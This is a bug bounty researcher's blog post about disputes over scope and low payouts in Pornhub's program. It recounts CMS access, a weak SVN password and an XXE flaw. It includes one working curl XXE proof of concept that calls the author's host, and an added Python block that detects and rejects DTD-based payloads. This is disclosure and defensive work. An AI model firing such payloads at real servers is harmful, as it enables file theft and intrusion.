I was possibly the first person invited to the Pornhub Bug Bounty about 11 months ago. Initially this bounty was a private bug bounty entitled "The Pornhub Network" and the scope was originally not limited to a single domain. At least that’s how any normal person would have comprehended the scope in the responsible disclosure policy. There was promise of massive rewards then too, so it seemed intuitive that the scope was the larger Pornhub network as described. Now since it’s public, a maximum reward of $25,000 is a great way of advertising and getting lots of media attention, let alone from the bug bounty community. The reality however is that this figure was most likely pulled out of someone’s ass, which is not that hard to imagine considering the site content. I have seen nothing to suggest they have ever paid anything near that amount as a reward nor intend to. It is simply false advertising in which they receive all the benefit.
The Pornhub Network is a very extensive collection of websites owned by MindGeek. Many of these sites offer premium content and as cream gets the money, dollar dollar bill yall. I approached it like I do any standard penetration test and began information gathering, however given the large number of assets they have, I spent a few evenings on OSINT. Once I started reporting things I found, it became pretty obvious how little thought Pornhub had given to the wording of their scope. It’s also entirely possible they knew exactly what they were doing by advertising large rewards and played me for a fool.
I didn’t write this blog post earlier because soon after the Pornhub bounty went public there was someone on twitter apparently selling pornhub shells. I certainly didn’t want my findings in the early days of their bounty being associated with that silly carry on. The infosec media is very knee-jerk and often points fingers at potential culprits so I feared I could have ended up on the receiving end of such accusations. I did not want to be associated with a cunt who claimed they fucked up porn sites simply for attention (inorite). Here I am, writing my blog post on how I tried to. Infosec blog posts are basically thinly veiled bragging anyway, complete with trying to play it off that you are actually cool.
After seeing a bukkake of $50 rewards in the public disclosure feeds from hackerone, and seeing people saying the Pornhub bounty sucks on twitter, I’m going to join in and share what I found. The highest reward I received was $750, this was for gaining access to a pornhubpremium.com content management system. It was described as out of scope like pretty much all my other bugs at the time. The bounty scope was updated to include the domains it does now on my request, after I explained to them the shortcomings of their original scoping. I spent a large amount of time looking at and probing their assets, and I was severely disappointed when they decided to have a change of heart about their scope at my expense. On hackerone there is nothing stopping any company from doing this in private to researchers. Be very cautious fellow hunters. Many will gladly fuck you over for a cheap pentest. I think in many cases companies don’t even know what assets they have exposed to the internet… they should at least figure this out before going to create a lazy scope.
The first image above is one of the CMS panels I managed to gain access to, the second is something within a panel called DECEPTICron, which basically lets you run a cron job on any of the listed hosts in the image below. That’s a lot of assets with remote code execution if you ask me. A $25k bug if ever I saw one. Pornhub told me it was out of scope (it wasn’t at the time) and that the server was old and soon to be decommissioned, which is fair enough. It’s very understandable that a researcher might over-estimate the severity of a vulnerability they found, in this case however the shells speak for themselves. All of the additional vulnerabilities I reported within the CMS once I gained access were marked out of scope (it was being decommissioned remember).
The second largest reward I got was $500 for essentially finding a few SVN repositories. Most were marked out of scope even though one of them was very much in scope (even now, but the site is gone): http://hubxt.pornhub.com/. The high severity here was that within the svn/entries I found another third-party external svn repository that required a htpasswd to access. One of the multiple usernames within the entries worked with the password 123456, which gave me full SVN read/write privileges on this repository; that could easily be converted to RCE in probably a lot more ways than simply committing shitty PHP code. The code had a lot of database passwords in it for multiple sites, along with lots of juicy looking stuff that wasn’t porn.
What an orgy.
The third reward I got was $150 for an XXE that appeared in about 3-4 sites on the same subdomain including the pornhub.com domain. The proof of concept I submitted was very basic and I didn’t try to escalate it any further as I was already fairly disappointed at this point.
curl -d '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "http://makthepla.net/?ProofOfConcept2" >]><username>&xxe;</username>' http://target.domain.com/xml.php
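The XXE above works because the endpoint hands a client-supplied document, DOCTYPE and all, to a parser that honours entity declarations. The fix on the server side is to refuse any DTD in untrusted input before it reaches the parser, and the same indicators make a cheap detection rule for request bodies. The Python below is an added example written for this post, not code from the author or from any Pornhub site; the `xml.php`-style handler, the `example.invalid` host and the sample request bodies are all constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET

# Indicators of DTD-driven entity tricks in an inbound XML body. The only
# safe policy for untrusted input is to refuse a DOCTYPE outright, since a
# document without a DTD cannot declare any entity at all.
DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
EXTERNAL_ENTITY_RE = re.compile(
    r"<!ENTITY\s+(?:%\s*)?\S+\s+(?:SYSTEM|PUBLIC)\b", re.IGNORECASE)
PARAM_ENTITY_RE = re.compile(r"<!ENTITY\s+%", re.IGNORECASE)


class UnsafeXMLError(ValueError):
    """Raised when an inbound document carries a DTD we refuse to process."""


def xxe_indicators(body: str) -> list:
    """Return the names of the XXE indicators present in an XML body.

    Useful as a detection rule over logged request bodies: a plain client
    never needs to send a DOCTYPE to an endpoint that expects <username>.
    """
    found = []
    if DOCTYPE_RE.search(body):
        found.append("doctype")
    if EXTERNAL_ENTITY_RE.search(body):
        found.append("external-entity")
    if PARAM_ENTITY_RE.search(body):
        found.append("parameter-entity")
    return found


def parse_untrusted_xml(body: str) -> ET.Element:
    """Parse XML from an untrusted client, rejecting any document with a DTD.

    Rejecting the DOCTYPE up front means no entity (internal, external or
    parameter) can be declared, so the parser never has one to resolve.
    """
    if DOCTYPE_RE.search(body):
        raise UnsafeXMLError("DOCTYPE declarations are not accepted from clients")
    return ET.fromstring(body)


def username_from_request(body: str) -> str:
    """Hypothetical xml.php-style handler: pull <username> out of the body safely."""
    root = parse_untrusted_xml(body)
    if root.tag != "username":
        raise ValueError("unexpected root element %r" % root.tag)
    return (root.text or "").strip()


# Constructed sample request bodies (hypothetical, not captured from any site).
SAMPLE_BODIES = [
    # 1. What a legitimate client sends.
    "<username>alice</username>",
    # 2. The shape of the proof of concept above, pointed at a reserved host.
    '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [ <!ELEMENT foo ANY > '
    '<!ENTITY xxe SYSTEM "http://example.invalid/?ProofOfConcept" >]>'
    "<username>&xxe;</username>",
    # 3. A parameter-entity variant that pulls in an external DTD.
    '<!DOCTYPE foo [ <!ENTITY % ext SYSTEM "http://example.invalid/e.dtd"> %ext; ]>'
    "<username>bob</username>",
]


def triage(bodies) -> list:
    """Classify each body as accepted or rejected, with the indicators seen."""
    results = []
    for body in bodies:
        try:
            name = username_from_request(body)
            results.append(("accepted", name, xxe_indicators(body)))
        except UnsafeXMLError:
            results.append(("rejected", None, xxe_indicators(body)))
    return results


if __name__ == "__main__":
    for verdict, name, indicators in triage(SAMPLE_BODIES):
        print(verdict, name, indicators)
```

Only the first body is accepted; the other two are refused before the parser runs, and `xxe_indicators` reports why. Refusing the DOCTYPE is deliberately stricter than trying to switch off individual entity features, because parser defaults differ between libraries and versions and a blanket rejection does not depend on any of them.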
It seemed to me that pornhub just marked stuff out of scope as I reported it and then narrowed their scope section on regular intervals. Now they have a public bounty and are getting a lot of media attention for being pro-security. Very disappointing and demotivational.